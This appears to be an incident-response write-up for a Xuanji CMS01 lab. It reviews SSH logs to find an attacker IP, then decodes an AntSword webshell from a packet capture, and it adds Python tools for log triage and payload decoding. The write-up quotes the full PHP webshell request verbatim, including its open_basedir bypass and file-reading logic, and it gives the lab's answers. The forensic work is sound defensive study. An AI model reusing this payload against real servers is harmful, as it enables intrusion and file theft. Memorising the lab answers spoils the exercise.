Xuanji (玄机) Linux practical: CMS01

Once on the box, the first thing we look at is the SSH log, which on this host lives at /var/log/secure (the RHEL-family location; Debian-family systems write the same lines to /var/log/auth.log). Reading through it, one address stands out: 192.168.20.1 gets a root session with a password three times (14:30, 15:04 and 15:36), the last one seconds after a failed attempt on the same sshd child, whereas the earlier loopback login at 10:30 used an ED25519 public key.

[root@ip-10-0-10-4 log]# cat secure
Mar 20 10:30:24 web-server sshd[1054]: Received SIGHUP; restarting.
Mar 20 10:30:24 web-server sshd[1054]: Server listening on 0.0.0.0 port 22.
Mar 20 10:30:24 web-server sshd[1054]: Server listening on :: port 22.
Mar 20 10:30:25 web-server sshd[4111]: Accepted publickey for root from 127.0.0.1 port 55976 ssh2: ED25519 SHA256:5wjncpQo9MtvNtk8t3A1CdOx2horMhYTghdrKk4ey0k
Mar 20 10:30:25 web-server sshd[4111]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 20 10:30:25 web-server sshd[1054]: Received SIGHUP; restarting.
Mar 20 10:30:25 web-server sshd[1054]: Server listening on 0.0.0.0 port 22.
Mar 20 10:30:25 web-server sshd[1054]: Server listening on :: port 22.
Mar 20 10:30:38 web-server sshd[4111]: pam_unix(sshd:session): session closed for user root
Mar 20 10:30:50 web-server sshd[4269]: Did not receive identification string from 127.0.0.1 port 55998
Mar 20 14:29:37 web-server polkitd[729]: Loading rules from directory /etc/polkit-1/rules.d
Mar 20 14:29:37 web-server polkitd[729]: Loading rules from directory /usr/share/polkit-1/rules.d
Mar 20 14:29:37 web-server polkitd[729]: Finished loading, compiling and executing 2 rules
Mar 20 14:29:37 web-server polkitd[729]: Acquired the name org.freedesktop.PolicyKit1 on the system bus
Mar 20 14:29:40 web-server sshd[1057]: Server listening on 0.0.0.0 port 22.
Mar 20 14:29:40 web-server sshd[1057]: Server listening on :: port 22.
Mar 20 14:30:21 web-server sshd[2365]: Accepted password for root from 192.168.20.1 port 9509 ssh2
Mar 20 14:30:21 web-server sshd[2365]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 20 14:50:17 web-server sshd[3760]: Did not receive identification string from 127.0.0.1 port 46734
Mar 20 14:50:22 web-server sshd[3813]: Did not receive identification string from 127.0.0.1 port 46744
Mar 20 15:04:20 web-server sshd[2365]: Received disconnect from 192.168.20.1 port 9509:11:
Mar 20 15:04:20 web-server sshd[2365]: Disconnected from 192.168.20.1 port 9509
Mar 20 15:04:20 web-server sshd[2365]: pam_unix(sshd:session): session closed for user root
Mar 20 15:04:22 web-server sshd[4068]: Accepted password for root from 192.168.20.1 port 12423 ssh2
Mar 20 15:04:22 web-server sshd[4068]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 20 15:36:22 web-server sshd[4377]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.20.1  user=root
Mar 20 15:36:22 web-server sshd[4377]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
Mar 20 15:36:25 web-server sshd[4377]: Failed password for root from 192.168.20.1 port 1378 ssh2
Mar 20 15:36:28 web-server sshd[4377]: Accepted password for root from 192.168.20.1 port 1378 ssh2
Mar 20 15:36:28 web-server sshd[4377]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 20 15:39:14 web-server sshd[4068]: Received disconnect from 192.168.20.1 port 12423:11:
Mar 20 15:39:14 web-server sshd[4068]: Disconnected from 192.168.20.1 port 12423
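To make the triage above repeatable, here is an added example (not part of the original write-up) that parses the sshd lines of /var/log/secure, summarizes authentications per source IP, and flags the two signals visible in this log: a non-loopback address obtaining root with a password, and a failure followed by a success within the same sshd PID. The sample lines are copied from the excerpt above; the trusted-address list and the read_secure() path are assumptions for this host.

```python
import re
from collections import defaultdict

# Sample input: six lines taken from the /var/log/secure excerpt above (constructed
# here as an inline string so the script runs offline; point read_secure() at the
# real file on a live box).
SAMPLE_LOG = """\
Mar 20 10:30:25 web-server sshd[4111]: Accepted publickey for root from 127.0.0.1 port 55976 ssh2: ED25519 SHA256:5wjncpQo9MtvNtk8t3A1CdOx2horMhYTghdrKk4ey0k
Mar 20 14:30:21 web-server sshd[2365]: Accepted password for root from 192.168.20.1 port 9509 ssh2
Mar 20 14:50:17 web-server sshd[3760]: Did not receive identification string from 127.0.0.1 port 46734
Mar 20 15:04:22 web-server sshd[4068]: Accepted password for root from 192.168.20.1 port 12423 ssh2
Mar 20 15:36:25 web-server sshd[4377]: Failed password for root from 192.168.20.1 port 1378 ssh2
Mar 20 15:36:28 web-server sshd[4377]: Accepted password for root from 192.168.20.1 port 1378 ssh2
"""

# Matches the two sshd auth outcomes we care about; "invalid user" is optional so
# guesses against non-existent accounts are captured too.
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[(?P<pid>\d+)\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+)"
)


def parse_auth_events(text):
    """Return one dict per Accepted/Failed line, in log order."""
    return [m.groupdict() for m in map(AUTH_RE.match, text.splitlines()) if m]


def summarize_by_ip(events):
    """Per source IP: accepted/failed counts plus the users and auth methods seen."""
    summary = defaultdict(lambda: {"accepted": 0, "failed": 0, "users": set(), "methods": set()})
    for e in events:
        s = summary[e["ip"]]
        s["accepted" if e["result"] == "Accepted" else "failed"] += 1
        s["users"].add(e["user"])
        s["methods"].add(e["method"])
    return dict(summary)


def flag_root_password_logins(summary, trusted=("127.0.0.1", "::1")):
    """Non-trusted addresses that got a root session with a password.
    The trusted list is an assumption: on this host only loopback used a key."""
    return sorted(
        ip for ip, s in summary.items()
        if ip not in trusted and "root" in s["users"]
        and "password" in s["methods"] and s["accepted"] > 0
    )


def failed_then_accepted(events):
    """(pid, ip, user) where a failure precedes a success on the same sshd child:
    a mistyped known password or a guess that landed, either way worth a look."""
    failed_pids, hits = set(), []
    for e in events:
        if e["result"] == "Failed":
            failed_pids.add(e["pid"])
        elif e["pid"] in failed_pids:
            hits.append((e["pid"], e["ip"], e["user"]))
    return hits


def read_secure(path="/var/log/secure"):
    """Load the real log on a live host (assumed path; differs on Debian-family systems)."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return f.read()


if __name__ == "__main__":
    evts = parse_auth_events(SAMPLE_LOG)
    by_ip = summarize_by_ip(evts)
    for ip, s in by_ip.items():
        print(ip, s["accepted"], "accepted,", s["failed"], "failed,", sorted(s["methods"]))
    print("root-by-password from:", flag_root_password_logins(by_ip))
    print("failed then accepted:", failed_then_accepted(evts))
```

Swap SAMPLE_LOG for read_secure() on the target and the same two functions surface the candidate IP and the 15:36 retry without reading the file by eye.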

After submitting that, the next question is the administrator password the attacker changed. We looked at /etc/shadow and tried to crack the root hash with hashcat, but it did not crack. Only after checking the writeup did we realize the question is about the application's admin account, not the OS root: that credential lives in the site database, not in shadow. The intended route is to rename the 宝塔 (BT Panel) login, sign into the panel and open the site's database, where the encrypted password is stored. Auditing the CMS source and reversing its encryption logic gives the plaintext Network@2020.

Next we download the provided packet capture. Filtering on HTTP, the only suspicious traffic is a POST to the index.php?user-app-register route; submitting that route as the answer is accepted. The request body is as follows:

Network2020=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.9092ffb62";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "1a06c3"."8bac2b";echo @asenc($output);echo "322"."b090";}ob_start();try{$F=base64_decode(substr($_POST["x0b6b31b98f31d"],2));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&x0b6b31b98f31d=JzL3d3dy93d3dyb290LzEyNy4wLjAuMS92ZXJzaW9uMi5waHA=

This also gives us the webshell password: it is the name of the first POST parameter, Network2020, whose value is the PHP code the shell evaluates. The @ini_set("display_errors", "0") prologue, the open_basedir bypass loop, and the asenc()/asoutput() wrapper that brackets the result with random hex markers (1a06c3.8bac2b and 322.b090) are the fingerprint of an AntSword payload. Following the logic, the code takes the second parameter x0b6b31b98f31d, drops its first two characters, base64-decodes the rest to /www/wwwroot/127.0.0.1/version2.php, and reads that file back with fopen()/fread(). Since asenc() is the identity here, the matching HTTP response carries the file's contents in plaintext between the two markers, which is the quickest way to confirm what was read. Because the attacker is pulling version2.php through the shell, we infer that the uploaded trojan is this file.
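As an added example (not from the original write-up and not AntSword's own code), the following Python performs the decoding steps described above mechanically: it splits the captured body without re-URL-decoding it, identifies the password parameter, recovers the response markers, decodes the hidden base64 literal and the target path, and cuts the shell's output out of a matching HTTP response. The request body is the one shown above; the response body in the usage is constructed.

```python
import base64
import re

# Constructed sample: the captured POST body from the page, verbatim. It is shown
# already URL-decoded, so we must not unquote it again (that would turn the "++"
# in "$i++" into spaces and break the PHP we want to read).
CAPTURED_BODY = r'''Network2020=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.9092ffb62";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "1a06c3"."8bac2b";echo @asenc($output);echo "322"."b090";}ob_start();try{$F=base64_decode(substr($_POST["x0b6b31b98f31d"],2));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&x0b6b31b98f31d=JzL3d3dy93d3dyb290LzEyNy4wLjAuMS92ZXJzaW9uMi5waHA='''


def split_form_body(body):
    """Split key=value pairs on '&' and the first '=' only, with no percent-decoding."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[key] = value
    return params


def decode_inline_literals(php):
    """Decode every base64_decode("...") literal in the stager. Here the only one
    hides the open_basedir separator regex so it does not show up in a grep."""
    return {
        lit: base64.b64decode(lit).decode("latin-1")
        for lit in re.findall(r'base64_decode\("([A-Za-z0-9+/=]+)"\)', php)
    }


def analyze_payload(body):
    """Pull out what an analyst needs from an AntSword-style PHP stager:
    the shell password, the response markers, and the file the operator read."""
    params = split_form_body(body)
    # AntSword posts "<password>=<php code>" and the shell evals $_POST[<password>],
    # so the key whose value is PHP code is the password.
    password = next(k for k, v in params.items() if v.startswith("@ini_set("))
    php = params[password]
    # asoutput() brackets the result with two random hex markers built by
    # concatenation: echo "1a06c3"."8bac2b"; ... echo "322"."b090";
    markers = re.findall(r'echo "([0-9a-f]+)"\."([0-9a-f]+)";', php)
    prefix, suffix = ("".join(m) for m in markers[:2])
    # The sink: $F=base64_decode(substr($_POST["<param>"],<n>)); the file name is
    # carried in a second parameter as base64 after <n> random leading characters.
    sink = re.search(r'base64_decode\(substr\(\$_POST\["(\w+)"\],(\d+)\)\)', php)
    path_param, skip = sink.group(1), int(sink.group(2))
    target = base64.b64decode(params[path_param][skip:]).decode()
    action = "read_file" if "@fread(" in php else "unknown"
    # asenc() is the identity (no encoder configured), so the HTTP response carries
    # the file contents in plaintext between prefix and suffix.
    plaintext_response = "function asenc($out){return $out;}" in php
    return {
        "password": password, "markers": (prefix, suffix), "path_param": path_param,
        "target": target, "action": action, "plaintext_response": plaintext_response,
    }


def extract_response(http_body, markers):
    """Return the shell output between the two markers of a captured response, or None."""
    prefix, suffix = markers
    start = http_body.find(prefix)
    end = http_body.find(suffix, start + len(prefix)) if start >= 0 else -1
    if start < 0 or end < 0:
        return None
    return http_body[start + len(prefix):end]


if __name__ == "__main__":
    result = analyze_payload(CAPTURED_BODY)
    print(result)
    print(decode_inline_literals(split_form_body(CAPTURED_BODY)[result["password"]]))
    # Constructed response body standing in for the real one from the pcap.
    print(extract_response("<html>1a06c38bac2bFILE CONTENT HERE322b090</html>", result["markers"]))
```

On a real capture, feed the response body of the same TCP stream to extract_response(); whatever lands between the markers is exactly what the operator saw, which settles the question of what version2.php contained without guessing.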